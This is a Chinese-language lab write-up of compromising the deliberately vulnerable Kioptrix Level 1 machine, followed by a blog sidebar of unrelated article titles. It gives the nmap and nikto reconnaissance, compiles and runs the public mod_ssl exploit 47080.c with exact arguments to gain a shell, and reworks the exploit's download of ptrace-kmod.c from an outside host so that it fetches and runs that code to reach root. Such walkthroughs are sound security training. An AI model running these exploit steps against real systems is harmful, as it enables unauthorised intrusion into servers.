当前位置:网站首页>Kioptrix Level 1 靶机wp
Kioptrix Level 1 靶机wp
2022-08-10 23:05:00 【yq_00】
主机探活
这次的靶机刚开始扫描不到网络,上网搜索,得到解决办法如下:
将下载的靶机文件中后缀为 vmx 的文件中的 bridged 改为 nat 即可(一共两个,改前一个即可)
参考文章:https://blog.csdn.net/Viv233/article/details/104103628
nmap -sP 192.168.159.0/24
这里我本地的截图丢了,找不到了,凑活看吧,能明白就好,后面重点的地方图都在
得到主机IP:192.168.159.156
端口发现
nmap -sV -p- -A 192.168.159.156
图丢了。。。不影响。。。
开放端口:22、80、139、443、1024
80端口
nikto
nikto -h 192.168.159.156
发现了一个 mod_ssl 模块,显示这个版本可能存在 远程栈溢出导致的 REC漏洞(日常丢图,大家做的时候敲命令就行。。。)
mod_ssl
尝试利用mod_ssl模块直接获取权限
searchsploit mod_ssl 2.8.4
找到了三个可用文件,但是经过测试只有一个文件可以使用
searchsploit -m 47080.c #将文件移到当前文件夹
编译运行
gcc -o EXP 47080.c -lcrypto
设置相应的参数

版本、目标IP、端口、线程
之前的namp扫描得出其系统与apache版本信息:RedHat Linux 和 Apache 1.3.20

找到两个相对应的参数,挨个尝试
./EXP 0x6a 192.168.159.156 443 -40
./EXP 0x6b 192.168.159.156 443 -40

0x6a 失败,未能成功反弹shell
0x6b 成功
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2zVvOteQ-1660130748200)(Untitled/image-20220806234203084.png)]](/img/26/7d15f28b3ae1ea202ca2f11b89722a.png)
获得apache权限
提权
setuid
find / -perm -u=s -type f 2>/dev/null

没啥特殊的
计划任务
crontab -l
cat /etc/crontab

emmm,几个文件看了都是只读,我没看出来有什么可以利用的。。。
sudo

不知道密码,寄
信息收集
各个目录下找了好久,没有啥有价值的信息。。。
上脚本
python -m SimpleHTTPServer 80 #服务端
wget 192.168.159.131/pspy64 #客户端

传了两个版本都跑不起来。。。应该是没有运行权限,或者是操作系统版本太低了。。。
???从做系统版本低?有没有可能直接有操作系统层面的漏洞?
操作系统漏洞
uname -a #查看操作系统版本

Linux 2.4.7-10
searchsploit Linux 2.4.7-10 Privilege Escalation
Privilege Escalation 权限提升

试了几个,都不行。。。不想试了。。。
没法子了,去网上搜索一下别人的 wp 吧,以下内容参考:
Kioptrix Level 1 - vulnhub 演练 - NetOSec
mod_ssl脚本完全体
我们发现,在运行之前的mod_ssl脚本时其实是有报错的

这我是真没注意。。。
所以说以后还是要注意细节啊!!!
缺少一个文件:ptrace-kmod.c,该程序试图下载另一个源文件进行编译和执行,但失败了。
在之前的脚本中找到这个文件位置

https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
我们先把它下载下来:
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
把源文件中的下载地址改为本机地址:

本地开一个服务器:
python -m SimpleHTTPServer 80

重新编译脚本文件并运行:
gcc -o EXP 47080.c -lcrypto
./EXP

还是老报错,但我直接命令行 wget 就能成功。。。
这里其实是因为这个下载操作是在靶机上实现的,127的IP肯定不行,要用192的IP地址。。。md,脑瘫了,搞了好久。。。

重新编译运行

终于成功了,呜呜呜呜呜,泪流满面!!!
附
看网上别的大佬们的wp,发现这个靶机还有其他的方式可以攻破,比如利用smb的漏洞直接获取root权限。
我就不写了,想了解的朋友可以参考这位大佬文章:https://netosec.com/kioptrix-level-1-vulnhub/
边栏推荐
猜你喜欢
随机推荐
CSAPP lab1 DataLab
Redis - Use lua script to control the number of wrong passwords and lock the account
Metasploit——客户端渗透
2022牛客多校(七)K. Great Party博弈方法证明
浅析工业互联网
【Maui正式版】创建可跨平台的Maui程序,以及有关依赖注入、MVVM双向绑定的实现和演示
"Linux" pagoda panel set up MySQL slow query log, not walk index log
Glide监听Activity生命周期源码分析
Btree index and Hash index
vr虚拟仿真教学系统应用场景开发
二叉树 | 代码随想录学习笔记
HGAME 2022 复盘 writeup
HGAME 2022 Week1 writeup
实例055:按位取反
大厂面试热点:“热修复机制及常见的几个框架介绍”
(PC+WAP)带手机端pbootcms模板园林景观类网站
关于弱监督学习的详细介绍——A Brief Introduction to Weakly Supervised Learning
双向循环链表-配有视频讲解
IFIT的架构与功能
vr工业操作培训模拟系统可以应用到哪些场景中









